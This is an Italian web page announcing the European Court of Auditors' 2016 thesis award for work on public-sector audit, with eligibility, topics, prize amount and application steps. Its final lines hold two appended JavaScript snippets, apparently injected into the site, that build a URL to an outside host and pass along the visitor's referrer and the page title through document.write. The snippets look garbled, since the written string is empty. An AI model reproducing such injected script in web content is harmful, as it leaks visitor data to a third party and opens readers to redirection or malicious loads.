Premio di laurea Corte dei Conti europea 2016

La Corte dei Conti europea ha indetto un bando di laurea omonimo destinato a tesi nel settore dell’audit pubblico. Il premio è stato istituito in memoria di Henrik Otbo, ex membro della Corte dei Conti, per il suo contributo all’evoluzione dei princìpi di audit.

A chi è rivolto

Il premio di laurea Corte dei Conti europea 2016 è rivolto a laureati che abbiano presentato una tesi di laurea o di dottorato e abbiano sostenuto l’esame orale dopo il 31 dicembre 2011. Possono partecipare i cittadini dell’Unione Europea che abbiano discusso una tesi presso un’università dell’Unione Europea. La tesi di laurea o di dottorato non deve essere già stata presentata nell’ambito di un bando indetto dalla Corte dei Conti europea. Le tesi di laurea devono essere state discusse su uno dei seguenti argomenti: metodi e i princìpi di audit; l’audit finanziario, l’audit di conformità e il controllo di gestione; l’audit delle finanze dell’UE; metodi di informativa; aspetti organizzativi e manageriali; l’audit interno e il controllo interno; la rendicontabilità del settore pubblico; l’audit unico; l’etica dell’audit; la valutazione e l’analisi dell’impatto; i rapporti fra le Istituzioni superiori di controllo e i parlamenti nazionali; la governance dell’UE.

L’importo e la durata

Il vincitore o i vincitori del premio di laurea Corte dei Conti europea 2016 riceveranno un riconoscimento pari al valore di euro 5.000.

I requisiti

Per candidarsi al premio di laurea Corte dei Conti europea 2016 bisogna essere in possesso dei seguenti requisiti:

  • essere cittadini dell’Unione Europea;
  • aver completato gli studi presso un’università dell’Unione Europea;
  • aver conseguito una tesi di laurea o di dottorato dopo il 31 dicembre 2011;
  • aver discusso una tesi in tema audit pubblico.

Come e quando presentare domanda

Per candidarsi al premio di laurea Corte dei Conti europea 2016 bisogna inviare copia della tesi di laurea; un breve riassunto della tesi (5000 parole massimo); uno scritto che spieghi il perché la tesi rientri nell’ambito del premio (massimo 1000 parole); breve lettera di referenza da un professore dell’università presso la quale si è discussa la tesi (2.000 parole massimo); curriculum vitae. I documenti in formato PDF devono essere inviati all’indirizzo email award@eca.europa.eu entro il 15 dicembre 2016.

Bando premio di laurea Corte dei Conti europea 2016(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();